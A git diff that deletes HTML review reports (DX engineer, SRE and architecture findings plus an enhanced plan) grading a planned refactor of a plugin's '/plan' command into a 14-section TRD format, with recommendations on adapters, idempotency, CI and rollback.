-<p><strong>Strengths:</strong> TRD-format eval matrix genuinely well-designed. 14 missing-section + drift + vague-TBD is right shape and matches CLAUDE.md eval-coverage mandate. &quot;Named, distinguishable error&quot; requirement (EPIC-3-S2 AC) is a sharp testability bar.</p>
-<p><strong>Gaps:</strong></p>
-<ul>
-<li><strong>Adapter fixtures are one bullet for four heterogeneous REST APIs.</strong> No mention of <code>responses</code>/<code>vcrpy</code>/in-memory fake. <code>shield/adapters/clickup/tests/test_contract.py</code> already exists — plan should explicitly extend that pattern.</li>
-<li><strong>No re-run / idempotency test.</strong> EPIC-2-S2 AC says &quot;Re-running /plan does not duplicate entries.&quot; Where is the fixture proving this? Same for EPIC-4-S3.</li>
-<li><strong>No failure-injection fixture for partial-success.</strong> Confluence accepts, Jira 5xxs — does <code>/pm-sync</code> exit non-zero? Continue?</li>
-<li><strong>EPIC-3-S2 AC undercounts negatives.</strong> &quot;14 missing-section&quot; + drift + vague-TBD = 16 total. EPIC-3-S3 says &quot;all 13 negatives fail&quot; — 14 vs 13 inconsistency.</li>
-</ul>
-<h4 id="4-framework-patterns--uv-based-deps--d">4. Framework patterns / uv-based deps — <strong>D</strong></h4>
-<p>This is the weakest point.</p>
-<ul>
-<li><strong>Only one adapter exists today as a uv package.</strong> Repo has <code>shield/adapters/clickup/pyproject.toml</code> and that's it. <strong>There is no <code>shield/adapters/jira/</code>, <code>confluence/</code>, or <code>notion/</code>.</strong> EPIC-4-S3 implies four-tool work but contains zero scaffolding tasks.</li>
-<li><strong>CLAUDE.md mandates uv-only Python.</strong> Each new adapter needs its own <code>pyproject.toml</code> declaring deps like <code>atlassian-python-api</code> or <code>requests</code>, plus a dev-dep for the test harness. Plan does not name any HTTP-client library.</li>
-<li><strong>No shared utility module.</strong> Four adapters will need the same <code>DesignRef</code> dataclass, the same &quot;skip if no link affordance&quot; decision, and the same logging shape. No <code>shield/adapters/_common/</code> story.</li>
-</ul>
-<h4 id="5-error--observability--d">5. Error &amp; observability — <strong>D+</strong></h4>
-<ul>
-<li><strong>One log line ≠ observability.</strong> No log level, no structured fields, no counter/event emission, no partial-failure surface.</li>
-<li><strong>No error taxonomy.</strong> What happens on malformed <code>anchor_url</code>? Adapter 401/403 vs 4xx vs 5xx? Rate-limited?</li>
-<li><strong>No retry policy.</strong> ClickUp adapter today almost certainly has retry/backoff. Plan doesn't say new adapters inherit it.</li>
-<li><strong><code>action_log</code> integration.</strong> Existing clickup adapter writes structured records (<code>action=&quot;sync_auto_link&quot;</code> at <code>sync.py:319</code>). EPIC-4-S3 should require a new action type <code>forward_design_ref</code> for traceability.</li>
-</ul>
-<h4 id="6-concurrency--idempotency--d">6. Concurrency &amp; idempotency — <strong>D</strong></h4>
-<ul>
-<li><strong>Upsert semantics undefined.</strong> Jira's remote-issue-link API uses <code>globalId</code> for upsert; without one, every <code>/pm-sync</code> re-run posts a duplicate. Obvious idempotency key: <code>globalId = sha256(story_id + anchor_url)</code>.</li>
-<li><strong>Confluence content-property</strong> vs <strong>inline-link</strong> distinction — Confluence has multiple &quot;remote link&quot;-shaped affordances and plan does not pick one.</li>
-<li><strong>No concurrent-sync story.</strong> Two engineers running <code>/pm-sync</code> on the same plan — locking or last-write-wins?</li>
-<li><strong>EPIC-5-S1 last_aligned_with race:</strong> what if <code>/implement</code> flips two stories to <code>done</code> from concurrent sessions?</li>
-</ul>
-<h4 id="7-deployment-safety--blast-radius--c">7. Deployment safety / blast radius — <strong>C</strong></h4>
-<p><strong>Strengths:</strong> Rollback path explicit. <code>design_refs[]</code> and <code>last_aligned_with</code> are additive. Pre-refactor folders stay readable.</p>
-<p><strong>Gaps:</strong></p>
-<ul>
-<li><strong><code>shield/schema/output-paths.yaml</code> is a consumer-facing contract.</strong> EPIC-1-S2 says &quot;replace <code>plan_arch_md</code> with <code>plan_trd_md</code>.&quot; Header reads &quot;Plugin-owned contract. Consumers should NOT edit.&quot; Consumers may depend on the key name. Plan should <em>add</em> <code>plan_trd_md</code> while keeping <code>plan_arch_md</code> deprecated.</li>
-<li><strong>No kill switch.</strong> &quot;Direct cutover&quot; with eval-shaped safety is reasonable for internal tool — but worth one sentence acknowledging only remedy is revert-the-PR.</li>
-<li><strong>Cross-PR coupling.</strong> EPIC-2-S1 (schema 1.2) in M1; EPIC-5-S1 (schema 1.3) in M3. If M2 ships and M3 stalls, sidecars stay at 1.2 with no <code>last_aligned_with</code> — fine because optional, but plan should affirm.</li>
-</ul>
-<h3 id="recommendations">Recommendations</h3>
-<h4 id="p0-block-merge-of-plan-into-implementation">P0 (block merge of plan into implementation)</h4>
-<p><strong>P0-1.</strong> Specify the adapter interface for <code>design_refs[]</code> forwarding (EPIC-4-S3). Lock the function signature and idempotency key across all four adapters: <code>forward_design_refs(task_id: str, refs: list[DesignRef]) -&gt; ForwardResult</code> with <code>ForwardResult{created, skipped, errors}</code>. Each ref produces <code>sha256(story_id + anchor_url)[:32]</code> used as <code>globalId</code>.</p>
-<p><strong>P0-2.</strong> Add an idempotency test fixture: &quot;Running <code>/pm-sync</code> twice in succession on the same plan produces the same remote state — no duplicate remote-links, no duplicate ClickUp custom-field writes.&quot;</p>
-<p><strong>P0-3.</strong> Add an adapter-scaffolding story or split EPIC-4-S3 by adapter. Only ClickUp exists as a uv package today. Either split into EPIC-4-S3a/b/c/d each with own scaffold, or add EPIC-4-S0: &quot;Scaffold <code>shield/adapters/{jira,confluence,notion}/</code> uv packages with <code>pyproject.toml</code>, MCP-server skeleton, <code>tests/</code>, and shared <code>shield/adapters/_common/design_refs.py</code>.&quot;</p>
-<p><strong>P0-4.</strong> Resolve the 14 vs 13 inconsistency across all artifacts.</p>
-<h4 id="p1-fix-before-implementation-milestone-closes">P1 (fix before implementation milestone closes)</h4>
-<p><strong>P1-1.</strong> Add a schema-validation story: <code>shield/scripts/validate_plan.py</code> using <code>pydantic</code> or <code>jsonschema</code>, invoked by <code>/plan-review</code> and the eval runner.</p>
-<p><strong>P1-2.</strong> Document forward-compat policy in <code>sidecar-schema.md</code>.</p>
-<p><strong>P1-3.</strong> Specify the HTTP test harness: &quot;Adapter eval fixtures use <code>responses</code> (or <code>respx</code>) to mock the remote APIs. No live HTTP. Tests tagged <code>@pytest.mark.adapter_contract</code> so they can run in CI without secrets.&quot;</p>
-<p><strong>P1-4.</strong> Specify observability shape: one <code>action_log</code> entry per ref forwarded with <code>action='forward_design_ref'</code>, fields <code>{story_id, adapter, anchor_url, outcome, idempotency_key}</code>. Failures emit <code>forward_design_ref_failed</code>.</p>
-<p><strong>P1-5.</strong> Add deprecation overlap for <code>output-paths.yaml</code>: keep <code>plan_arch_md</code> / <code>plan_arch_html</code> keys marked <code>deprecated: true</code>.</p>
-<h4 id="p2-polish-not-blocking">P2 (polish, not blocking)</h4>
-<ul>
-<li>Concurrent-sync acknowledgement in plan-architecture.md</li>
-<li>Rate-limit handling note per existing adapter posture</li>
-<li>Decide fate of this plan's own <code>plan-architecture.md</code> post-M1</li>
-</ul>
-
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/dx-engineer.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/dx-engineer.html
deleted file mode 100644
index 2b699559..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/dx-engineer.html
+++ /dev/null
@@ -1,216 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8">
-<title>Plan Review — /plan TRD refactor</title>
-<style>
-body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Arial, sans-serif; max-width: 960px; margin: 0 auto; padding: 24px; line-height: 1.6; color: #202124; }
-h1 { color: #1a73e8; border-bottom: 2px solid #1a73e8; padding-bottom: 10px; }
-h2 { color: #202124; border-bottom: 1px solid #dadce0; padding-bottom: 8px; margin-top: 32px; }
-h3 { color: #5f6368; margin-top: 22px; }
-h4 { color: #5f6368; margin-top: 18px; font-size: 1.05em; }
-table { border-collapse: collapse; width: 100%; margin: 15px 0; }
-th, td { border: 1px solid #dadce0; padding: 10px; text-align: left; vertical-align: top; }
-th { background-color: #f1f3f4; font-weight: bold; }
-tr:nth-child(even) { background-color: #f8f9fa; }
-code { background-color: #f1f3f4; padding: 2px 6px; border-radius: 4px; font-family: 'SF Mono', Menlo, 'Courier New', monospace; font-size: 13px; }
-pre { background-color: #f1f3f4; padding: 14px; border-radius: 8px; overflow-x: auto; font-family: 'SF Mono', Menlo, 'Courier New', monospace; white-space: pre; font-size: 12px; line-height: 1.4; }
-pre code { background: transparent; padding: 0; }
-blockquote { border-left: 4px solid #1a73e8; margin: 15px 0; padding: 10px 20px; background-color: #e8f0fe; }
-ul, ol { margin: 10px 0; padding-left: 24px; }
-li { margin: 4px 0; }
-hr { border: none; border-top: 1px solid #dadce0; margin: 24px 0; }
-a { color: #1a73e8; text-decoration: none; }
-a:hover { text-decoration: underline; }
-strong { font-weight: 600; }
-</style>
-</head>
-<body>
-<h1 id="dx-engineer--detailed-findings">DX Engineer — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h2 id="dx-engineer-review-grade-b">DX Engineer Review (Grade: B+)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>DX1</td>
-<td>Plan clarity</td>
-<td>A</td>
-<td>&quot;Why this refactor&quot; paragraph and milestone table give 30-second comprehension — &quot;unified 14-section TRD replacing free-form plan-architecture.md, covers backend + infra, direct cutover.&quot;</td>
-</tr>
-<tr>
-<td>DX2</td>
-<td>Story actionability</td>
-<td>B</td>
-<td>Most stories name exact files and concrete deltas. Gaps: EPIC-2-S2 names a &quot;heuristic for picking section_id&quot; but never defines what keyword-matching algorithm to use; EPIC-4-S3 says &quot;the relevant adapter logic (Python under shield/adapters/)&quot; without naming any of the 4 adapter files.</td>
-</tr>
-<tr>
-<td>DX3</td>
-<td>Implementation step detail</td>
-<td>B</td>
-<td>Strong specifics in many places (slug allow-list verbatim, domain-detection markers enumerated, thresholds quantified). Weak spots: EPIC-3-S2 doesn't show the YAML schema; EPIC-3-S3 says <code>uv run shield/evals/run.py plan-trd</code> &quot;or equivalent existing eval runner&quot; — author should commit to one.</td>
-</tr>
-<tr>
-<td>DX4</td>
-<td>Ambiguity audit</td>
-<td>B</td>
-<td>Several soft phrases survived: EPIC-4-S2 &quot;e.g., flag if &gt; 80 characters&quot; (advisory not normative); EPIC-5-S2 &quot;more than N lines&quot; and only later pins N=20; EPIC-1-S2 &quot;Mixed → annotate per section&quot; is undefined; EPIC-2-S2 says entries are &quot;preserved or updated in place&quot; — which is it?</td>
-</tr>
-<tr>
-<td>DX5</td>
-<td>Context sufficiency</td>
-<td>A</td>
-<td>Plan links to research.md, plan-architecture.md, and PR #43 sample. A new joiner can chase the references without tribal knowledge.</td>
-</tr>
-<tr>
-<td>DX6</td>
-<td>Dependency clarity</td>
-<td>A</td>
-<td>Milestone-level <code>depends_on</code> is explicit. M1 ships as a single PR is called out. Eval-before-generator constraint is documented. Minor gap: story-level depends_on is implicit only.</td>
-</tr>
-<tr>
-<td>DX7</td>
-<td>Tool &amp; access requirements</td>
-<td>C</td>
-<td><code>uv</code> implied by CLAUDE.md but never restated. EPIC-4-S3 needs Confluence/Jira/ClickUp/Notion credentials with no mention of test accounts, sandbox tenants, or how to mock. No mention of which Python version or new deps the eval runner might need.</td>
-</tr>
-<tr>
-<td>DX8</td>
-<td>Handoff readiness</td>
-<td>B</td>
-<td>A developer can start EPIC-1-S1, EPIC-3-S1, EPIC-3-S2 cold. EPIC-4-S3 and EPIC-2-S2 would generate questions. Plan assumes familiarity with <code>plan-docs/SKILL.md</code> &quot;generation prompt&quot; current shape.</td>
-</tr>
-<tr>
-<td>DX9</td>
-<td>Service boundaries</td>
-<td>B</td>
-<td>Boundaries are clean: <code>shield/commands/plan.md</code>, <code>shield/skills/general/plan-docs/</code>, <code>shield/schema/output-paths.yaml</code>, <code>shield/adapters/&lt;tool&gt;/</code>, <code>shield/evals/</code>. Gap: slug allow-list location is given as &quot;YAML or JSON sidecar under shield/schema/&quot; with choice left open.</td>
-</tr>
-<tr>
-<td>DX10</td>
-<td>API &amp; data flow design</td>
-<td>B</td>
-<td><code>design_refs[]</code> contract is explicit. Schema bump path documented (1.1 → 1.2 → 1.3). Gap: no inline example <code>design_refs[]</code> JSON instance; EPIC-2-S2's &quot;preserved or updated in place&quot; merge semantics absent.</td>
-</tr>
-<tr>
-<td>DX11</td>
-<td>Deployment strategy</td>
-<td>B</td>
-<td>&quot;Direct cutover, no feature flag&quot; is explicit. &quot;M1 ships as a single PR&quot; specifies atomicity. Old <code>plan-architecture.md</code> files preserved. Rollback strategy documented. Gap: no version bump checklist for <code>.claude-plugin/marketplace.json</code> and <code>pyproject.toml</code> per CLAUDE.md.</td>
-</tr>
-<tr>
-<td>DX12</td>
-<td>CI/CD integration</td>
-<td>C</td>
-<td>EPIC-3-S3 names &quot;Wire eval into CI&quot; but tasks only describe manual PR-body capture. No GitHub Action, no workflow file path, no auto-discovery of new evals. Story title says CI but tasks describe manual capture.</td>
-</tr>
-<tr>
-<td>DX13</td>
-<td>Error handling patterns</td>
-<td>B</td>
-<td>Several failure modes addressed (adapters without link affordance log + continue, <code>n/a — &lt;reason&gt;</code> escape, missing-reason flagged distinct from vague-TBD). Gap: malformed <code>trd.md</code> recovery? Unknown <code>doc</code> value in <code>design_refs[]</code>? Retry/idempotency for <code>/pm-sync</code> partial failures?</td>
-</tr>
-<tr>
-<td>DX14</td>
-<td>Configuration management</td>
-<td>C</td>
-<td>EPIC-1-S2 description says &quot;.shield.json + repo markers&quot; but plan.md drops the .shield.json mention. No mention of secrets management for 4 adapter credentials. Slug allow-list filename left to implementer.</td>
-</tr>
-<tr>
-<td>DX15</td>
-<td>Developer onboarding</td>
-<td>B</td>
-<td>plan-architecture.md is fine onboarding. research.md named authoritative. CLAUDE.md covers conventions. Gap: no local-dev &quot;how do I run /plan and see trd.md emit?&quot; walkthrough; no debugging note for non-deterministic eval failures.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Key Finding:</strong> The plan is one of the more actionable specs reviewed — concrete file paths, verbatim slug allow-list, specific thresholds, clear cutover stance — but four soft spots will generate Slack pings during execution: (1) <code>design_refs[]</code> section_id heuristic underspecified, (2) EPIC-4-S3 doesn't list 4 adapter file paths, (3) &quot;CI&quot; in EPIC-3-S3 is actually PR-body capture, (4) Mixed-domain &quot;annotate per section&quot; output format undefined.</p>
-<h3 id="recommendations">Recommendations</h3>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>DX2</td>
-<td>In EPIC-4-S3, replace &quot;the relevant adapter logic (Python under shield/adapters/)&quot; with the four explicit file paths and the function/class to extend in each.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>DX4</td>
-<td>In EPIC-2-S2 tasks, define the <code>section_id</code> selection heuristic concretely: name the exact keyword-matching algorithm.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>DX4</td>
-<td>In EPIC-2-S2 AC #3, replace &quot;existing entries are preserved or updated in place&quot; with a precise merge rule.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>DX12</td>
-<td>In EPIC-3-S3, decide whether eval runs in GitHub Actions or only in PR-body capture. If CI is in scope, add a workflow YAML task; if not, retitle.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>DX4</td>
-<td>In EPIC-1-S2, define what &quot;Mixed → annotate per section&quot; emits in the TRD prose.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>DX7</td>
-<td>Add a &quot;Tool &amp; access requirements&quot; subsection covering test tenants, credential location, Python deps.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>DX14</td>
-<td>In EPIC-1-S2, decide and document: does domain detection consult <code>.shield.json</code> or only repo markers? The two documents disagree.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX3</td>
-<td>In EPIC-3-S2/S3, lock the eval runner invocation.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX9</td>
-<td>In EPIC-1-S1, choose YAML or JSON for the slug allow-list sidecar and commit to a filename.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX10</td>
-<td>Add an inline example <code>design_refs[]</code> JSON instance to EPIC-2-S1 description.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX11</td>
-<td>Add a task to EPIC-1-S2 (or a separate release story) for version bumps in <code>.claude-plugin/marketplace.json</code> and <code>pyproject.toml</code>.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX13</td>
-<td>Add an AC or task covering <code>/pm-sync</code> partial-failure behavior when 1 of 4 adapters errors.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX15</td>
-<td>Add a &quot;local development&quot; note describing how to run <code>/plan</code> against a fixture repo.</td>
-</tr>
-</tbody>
-</table>
-
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/sre.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/sre.html
deleted file mode 100644
index 027d83ec..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/sre.html
+++ /dev/null
@@ -1,148 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8">
-<title>Plan Review — /plan TRD refactor</title>
-<style>
-body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Arial, sans-serif; max-width: 960px; margin: 0 auto; padding: 24px; line-height: 1.6; color: #202124; }
-h1 { color: #1a73e8; border-bottom: 2px solid #1a73e8; padding-bottom: 10px; }
-h2 { color: #202124; border-bottom: 1px solid #dadce0; padding-bottom: 8px; margin-top: 32px; }
-h3 { color: #5f6368; margin-top: 22px; }
-h4 { color: #5f6368; margin-top: 18px; font-size: 1.05em; }
-table { border-collapse: collapse; width: 100%; margin: 15px 0; }
-th, td { border: 1px solid #dadce0; padding: 10px; text-align: left; vertical-align: top; }
-th { background-color: #f1f3f4; font-weight: bold; }
-tr:nth-child(even) { background-color: #f8f9fa; }
-code { background-color: #f1f3f4; padding: 2px 6px; border-radius: 4px; font-family: 'SF Mono', Menlo, 'Courier New', monospace; font-size: 13px; }
-pre { background-color: #f1f3f4; padding: 14px; border-radius: 8px; overflow-x: auto; font-family: 'SF Mono', Menlo, 'Courier New', monospace; white-space: pre; font-size: 12px; line-height: 1.4; }
-pre code { background: transparent; padding: 0; }
-blockquote { border-left: 4px solid #1a73e8; margin: 15px 0; padding: 10px 20px; background-color: #e8f0fe; }
-ul, ol { margin: 10px 0; padding-left: 24px; }
-li { margin: 4px 0; }
-hr { border: none; border-top: 1px solid #dadce0; margin: 24px 0; }
-a { color: #1a73e8; text-decoration: none; }
-a:hover { text-decoration: underline; }
-strong { font-weight: 600; }
-</style>
-</head>
-<body>
-<h1 id="sre--detailed-findings">SRE — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h2 id="operations-review--plan-grade-c">Operations Review — Plan (Grade: C)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>OP1</td>
-<td>Observability plan</td>
-<td>C</td>
-<td>Eval fixtures (EPIC-3) are the primary observability surface — they tell us when the TRD format drifts. <code>last_aligned_with</code> (EPIC-5-S1) is mentioned as undead-doc telemetry. But no plan for: emitting structured logs from <code>/plan</code> runs, capturing failure telemetry from real-user <code>/plan</code> invocations, or reporting on TRD generation quality in production. The eval is offline only.</td>
-</tr>
-<tr>
-<td>OP2</td>
-<td>Monitoring &amp; alerting</td>
-<td>F</td>
-<td>The plan says nothing about alerting on <code>/plan</code> failure or how regression in CI is surfaced. EPIC-3-S3 captures a PR-time RED→GREEN paper trail but doesn't wire the eval into ongoing CI — only into the implementation PR description. No mention of who is notified if the eval fails post-merge on a future change. No escalation path defined.</td>
-</tr>
-<tr>
-<td>OP3</td>
-<td>Failure mode analysis</td>
-<td>C</td>
-<td>Some failure modes addressed (format drift via eval, undead-doc via <code>last_aligned_with</code>, re-run safety via EPIC-1-S3 guard). But several first-order failure modes from the refactor itself are not covered: (a) what happens when <code>/plan</code> runs but emits a malformed <code>trd.md</code> after M1 lands; (b) mixed-domain repos where domain detection misfires; (c) what happens if <code>/plan-review</code> (M2) ships against TRDs that pre-date M1's slug allow-list; (d) the eval cannot validate semantic correctness — only structure.</td>
-</tr>
-<tr>
-<td>OP4</td>
-<td>Backup &amp; recovery</td>
-<td>B</td>
-<td>Strong implicit answer: git history is explicitly called the archive. Existing <code>plan-architecture.md</code> files are preserved. RPO for the tool is effectively zero (everything is source-controlled markdown). RTO for a bad emit is &quot;git revert + re-run /plan&quot;. Minor gap: no corruption-recovery for a half-written <code>trd.md</code>.</td>
-</tr>
-<tr>
-<td>OP5</td>
-<td>Capacity planning</td>
-<td>B</td>
-<td>Not a scale-sensitive system. The plan implicitly handles growth by being additive. No explicit consideration of number of <code>design_refs[]</code> per story or whether the 14-section template scales to large/small features without padding. Acceptable for meta-tooling context.</td>
-</tr>
-<tr>
-<td>OP6</td>
-<td>Change management</td>
-<td>C</td>
-<td>§Rollback Strategy is concrete. M1 is correctly identified as atomic-PR. However: (a) no canary or staged rollout — direct cutover is the choice but blast radius is every future <code>/plan</code> run; (b) no rollback <em>trigger</em> defined; (c) the version-bump discipline from CLAUDE.md is not in any story's task list.</td>
-</tr>
-<tr>
-<td>OP7</td>
-<td>On-call readiness</td>
-<td>D</td>
-<td>Internal tooling — no formal on-call. Proxy concerns: (a) what error message a user sees if <code>trd.md</code> generation fails mid-stream; (b) any troubleshooting runbook when <code>/plan-review</code> flags a TRD the user believes is correct; (c) where users report bugs against the new TRD format; (d) what version of the plugin a <code>trd.md</code> was generated by — no provenance stamp on emitted TRDs. The <code>last_aligned_with</code> field helps for drift but not for incident triage.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Key Finding:</strong> The refactor has a solid format-correctness safety net (eval fixtures, RED→GREEN paper trail, atomic M1 PR) but lacks a <em>runtime</em> safety net — no continuous CI eval gate, no rollback trigger, no provenance stamping on generated <code>trd.md</code> files, and no failure-mode coverage for mixed-domain repos or interrupted <code>/plan</code> runs.</p>
-<h3 id="recommendations">Recommendations</h3>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P0</td>
-<td>OP2</td>
-<td>Add a story to EPIC-3 wiring <code>shield/evals/plan-trd.yaml</code> into a recurring CI job (e.g., <code>.github/workflows/</code>), not just the implementation PR body. Without this, a future <code>plan-docs/SKILL.md</code> edit can silently break the 14-section contract.</td>
-</tr>
-<tr>
-<td>P0</td>
-<td>OP3</td>
-<td>Add an EPIC-1-S2 task: define the failure mode when <code>/plan</code> cannot determine domain (mixed <code>*.tf</code> + <code>package.json</code>). &quot;Mixed → annotate per section&quot; has no AC and no eval fixture.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>OP6</td>
-<td>Add an explicit rollback-trigger statement to plan-architecture.md §Rollback: &quot;Revert M1 if any of: (a) eval fails on positive fixtures after merge, (b) &gt;N user-reported broken <code>/plan</code> runs within 48 hours, (c) downstream <code>/pm-sync</code> adapter errors trace back to schema 1.2.&quot;</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>OP6</td>
-<td>Add a task to bump marketplace version in <code>.claude-plugin/marketplace.json</code> and <code>pyproject.toml</code> per CLAUDE.md &quot;When updating any plugin, bump its version in both…in the same commit&quot;.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>OP7</td>
-<td>Add an AC under EPIC-1-S2 to emit a provenance comment (e.g., <code>&lt;!-- generated by /plan vX.Y.Z on YYYY-MM-DD --&gt;</code>) at the top of <code>trd.md</code>.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>OP3</td>
-<td>Add a failure-mode AC: &quot;If <code>/plan</code> cannot write <code>trd.md</code> (disk error, partial write, missing template), it must not leave a corrupted file behind — write atomically (temp file + rename) or fail loudly with the partial file removed.&quot;</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP1</td>
-<td>Consider a lightweight <code>--dry-run</code> or <code>--validate-only</code> mode for <code>/plan</code> so users can verify a TRD passes the eval locally before committing.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP7</td>
-<td>Add a one-page troubleshooting block to <code>shield/commands/plan.md</code> listing the top 3 failure modes and recovery steps.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP3</td>
-<td>Add an eval fixture for the M2 backward-compat scenario: <code>/plan-review</code> running against a pre-M1 <code>plan-architecture.md</code>-only folder.</td>
-</tr>
-</tbody>
-</table>
-
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/enhanced-plan.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/enhanced-plan.html
deleted file mode 100644
index 164d8179..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/enhanced-plan.html
+++ /dev/null
@@ -1,396 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8">
-<title>Plan Review — /plan TRD refactor</title>
-<style>
-body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Arial, sans-serif; max-width: 960px; margin: 0 auto; padding: 24px; line-height: 1.6; color: #202124; }
-h1 { color: #1a73e8; border-bottom: 2px solid #1a73e8; padding-bottom: 10px; }
-h2 { color: #202124; border-bottom: 1px solid #dadce0; padding-bottom: 8px; margin-top: 32px; }
-h3 { color: #5f6368; margin-top: 22px; }
-h4 { color: #5f6368; margin-top: 18px; font-size: 1.05em; }
-table { border-collapse: collapse; width: 100%; margin: 15px 0; }
-th, td { border: 1px solid #dadce0; padding: 10px; text-align: left; vertical-align: top; }
-th { background-color: #f1f3f4; font-weight: bold; }
-tr:nth-child(even) { background-color: #f8f9fa; }
-code { background-color: #f1f3f4; padding: 2px 6px; border-radius: 4px; font-family: 'SF Mono', Menlo, 'Courier New', monospace; font-size: 13px; }
-pre { background-color: #f1f3f4; padding: 14px; border-radius: 8px; overflow-x: auto; font-family: 'SF Mono', Menlo, 'Courier New', monospace; white-space: pre; font-size: 12px; line-height: 1.4; }
-pre code { background: transparent; padding: 0; }
-blockquote { border-left: 4px solid #1a73e8; margin: 15px 0; padding: 10px 20px; background-color: #e8f0fe; }
-ul, ol { margin: 10px 0; padding-left: 24px; }
-li { margin: 4px 0; }
-hr { border: none; border-top: 1px solid #dadce0; margin: 24px 0; }
-a { color: #1a73e8; text-decoration: none; }
-a:hover { text-decoration: underline; }
-strong { font-weight: 600; }
-</style>
-</head>
-<body>
-<h1 id="plan-enhanced--plan-trd-refactor">Plan (Enhanced) — <code>/plan</code> TRD refactor</h1>
-<p><strong>Feature:</strong> <code>plan-trd-refactor-20260524</code> · <strong>Phase:</strong> v1 cutover · <strong>Source:</strong> <a href="../../../research.md"><code>../../../research.md</code></a> · <a href="../../../plan-architecture.md"><code>../../../plan-architecture.md</code></a>
-<strong>Sidecar:</strong> <a href="../../../plan.json"><code>../../../plan.json</code></a> (schema v1.1)
-<strong>Review applied:</strong> <a href="summary.md">summary.md</a> (composite B; 6 P0 + 15 P1 + 18 P2 recommendations)</p>
-<h2 id="what-changed-vs-original-planmd">What changed vs original <code>plan.md</code></h2>
-<p>Six P0 fixes and the most consequential P1s have been folded in. Specifically:</p>
-<ul>
-<li><strong>P0-1 fixed:</strong> &quot;13&quot; purged from all artifacts; EPIC-3-S3 AC now correctly references 16 negatives (14 missing-section + 1 drift + 1 vague-TBD)</li>
-<li><strong>P0-2 fixed:</strong> <strong>new EPIC-4-S0</strong> added — adapter package scaffolding (Jira/Confluence/Notion don't exist as <code>uv</code> packages today; only ClickUp does). EPIC-4-S3 now consumes that scaffolding rather than implying it</li>
-<li><strong>P0-3 fixed:</strong> EPIC-4-S3 now specifies the <strong><code>forward_design_refs(task_id, refs) → ForwardResult</code></strong> contract and the <code>globalId = sha256(story_id + anchor_url)[:32]</code> idempotency key</li>
-<li><strong>P0-4 fixed:</strong> <strong>new AC in EPIC-4-S3</strong> — &quot;Running <code>/pm-sync</code> twice in succession produces the same remote state&quot;</li>
-<li><strong>P0-5 fixed:</strong> EPIC-3-S3 renamed to &quot;Wire eval into recurring CI + RED→GREEN paper trail&quot; with an explicit <code>.github/workflows/</code> task</li>
-<li><strong>P0-6 fixed:</strong> EPIC-1-S2 now defines &quot;Mixed → annotate per section&quot; with a worked example; <strong>EPIC-3-S1 adds <code>positive-mixed/</code> fixture</strong></li>
-</ul>
-<p>P1s addressed inline:</p>
-<ul>
-<li>EPIC-2-S2 section_id heuristic (P1-1) and merge semantics (P1-2) now concretely specified</li>
-<li>EPIC-4-S3 adapter file paths (P1-3) enumerated</li>
-<li>EPIC-1-S2 reconciled — domain detection consults repo markers only; <code>.shield.json</code> <code>plan.template_override</code> is the override key (P1-5)</li>
-<li>EPIC-4-S1 gets a stale-anchor detection rule (P1-6)</li>
-<li><strong>New EPIC-2-S3:</strong> JSON Schema validator (P1-7)</li>
-<li>EPIC-4-S3 observability shape spelled out — <code>action='forward_design_ref'</code> with structured fields (P1-8)</li>
